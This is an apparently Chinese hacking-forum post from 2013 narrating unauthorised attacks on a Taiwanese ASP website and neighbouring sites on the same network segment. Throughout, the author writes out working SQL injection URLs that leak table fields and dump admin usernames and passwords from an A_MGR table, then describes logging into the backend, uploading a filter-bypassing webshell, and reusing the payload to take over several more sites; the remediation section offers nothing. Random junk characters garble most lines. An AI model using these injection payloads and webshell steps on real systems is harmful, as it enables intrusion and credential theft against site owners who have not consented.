发现一个注入点
9 h/ M7 |* g& }http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389' C. ?9 O" s) @, A0 D0 p: c# N8 s
" u/ N1 S. t9 V# e& x习惯性的加’having1=1--
9 y" M7 C) M* N8 _: u" y& K" F( I
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—9 R; j& L2 x; @- ?$ w& ]
$ D. |( P* o7 w08 S) _9 u% c$ P0 d' y1 o% P* F3 Y
; `- h0 v: p. y4 N6 s7 W
爆出Diary_A.dl_Title(这时候很激动啊)
6 K/ B5 N( ]& u" r" S( v- x; h
8 I/ e) r4 P7 H2 ]6 f. x; Z/ Y$ P那么继续
" _0 Q) v8 {9 }. V3 W7 y @2 yhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—9 w$ g( q1 J5 L! U
' |( t( N' p4 M$ g* t# l0 d
继续,一直爆下去
# Z8 ~/ ?( j) G9 J; l: X6 {0 p) e9 P
爆到几个字段和表段 但是没找到需要的管理用户的字段
( |, Q! H h- f% C4 _8 r) ?
/ A7 r) D5 b& X0 d0 G# \$ ~蛋疼了 怎么办 然后去后台登陆页看源码- X; R, G2 i. j* ]6 @
& @' S! a* g: z0 ]( U
06 V# z) w- w& {6 u: L: B0 u- _
o( M: D% R# O) p* [+ wInput name= “ADUID”. Y/ y5 ~3 s1 d# I/ l! x
Input name= “ADPWD”( Z4 j9 E( R8 z ?4 F6 g
( q# k A* N. x* z3 w* @" K" h
很幸运 找到了字段那就继续0 i% d, x, n3 N6 o6 i' G+ c
找到之后开始爆用户
) }3 K0 z r/ r. s2 Ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—: ~# L0 u. _& \0 Z0 _: v% Z F4 L
爆密码
7 `4 v1 n! p" Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—+ k- |( `6 U6 w, a8 \$ U, ~
测试了下 这个注入点只能爆到文章哪里的表 6 ]) }3 y6 a! b6 t" [' B
, h B( |4 a: s7 ?; h1 @! e$ g
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
: o2 |, a6 v M$ t4 }2 ^' l2 P. Y0 \+ J0 }4 A) q0 N Y
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了! t( Q5 B1 B; P7 @
' { ]1 }1 n, ^% r' H
473
4 V1 D: [! k1 D* w g, A$ j! w- r' v( b9 P0 _6 t6 e
进后台
. C2 B6 O8 V M+ ] z
, p+ K; w1 V2 s% S, y- M
7 y; x" A. q+ s7 L# X1 h发现几个上传点 有的地方不能上传 而且防止恶意代码
0 V- ~& W7 O5 j* p2 i* |2 _" I# J6 N- u2 C7 Q) h
没办法 各种百度各种找大牛 找到一只好像可以突破的马
! X4 V. `5 t4 e% C2 M# d0 G2 m8 ~ o, F! m3 X
# C- U% L# A! z+ k+ h) _5 x. P在系统管理那里直接上传 不过没有显示地址
+ U2 ?2 r: X$ s. T% s: r0 U h) g& C' y* i% k+ I
再上传一次 抓包 搞定OK+ |. s8 S$ E* \9 {, K/ t
/ U; s) ]! g1 L: U$ f6 j
4 J+ S% U4 c, F& q
1 k' S# x0 y) n7 Q0 i* {: s! |0 b% v472
3 M% t0 y# q" G* b t
0 F8 Y5 P/ v! Y4 B2 |, Z( D" H晚上不行了 去睡觉。。。6 |1 l: M+ E* B* u7 V
第二天刚起床 闲的没事做继续日站吧 1 J# k9 U+ H; r
! h. d$ t! I% q# M- X找个站 就把这个站的旁c扫了下
: V, P! |, B$ X. v, f# |
1 m5 I% p$ x" F) }$ Y! Y发现c段也有一个购物站 ,然后还和这个站的模板差不多- A+ ^4 n1 p+ _; L3 }
+ ^, D: o* I: [# G% a就找到会员登录口测试8 N$ S0 a- l& `
" x( G, T, _0 {9 w; T0 U9 J
'and (select top 1 MGR_UID from A_MGR)>0—( w& ^9 k: u/ D
果断爆到了 这时候我很激动 通杀
. K. j G& h2 y% N) n
$ U% L' g$ U9 C' B再次翻c段- s n. C. _- H- z: H
`! B3 v4 n/ e$ i. C2 {& U. X
翻出几个站 都成功拿下
b* L0 o7 K2 W& _4 {3 r( x& D7 H m* k( ~( Q! d; \! R: x" G/ O) F
8 W6 y0 S5 |; [4 M/ F* x
+ E' |0 T% ~; x. Y, _& u修复方案:
' {2 F2 w2 P2 p2 }& k- o$ m& ?他们比我专业
9 d/ L' R7 M7 U0 O, f6 |! t' K4 ^$ l6 y) `1 N3 f
4 L$ T$ |8 |( o$ d" T3 _
; ^2 q0 ?6 G% Q2 h+ o4 b+ C) c1 C |
发表于 2013-4-4 17:40:38
收藏
支持
反对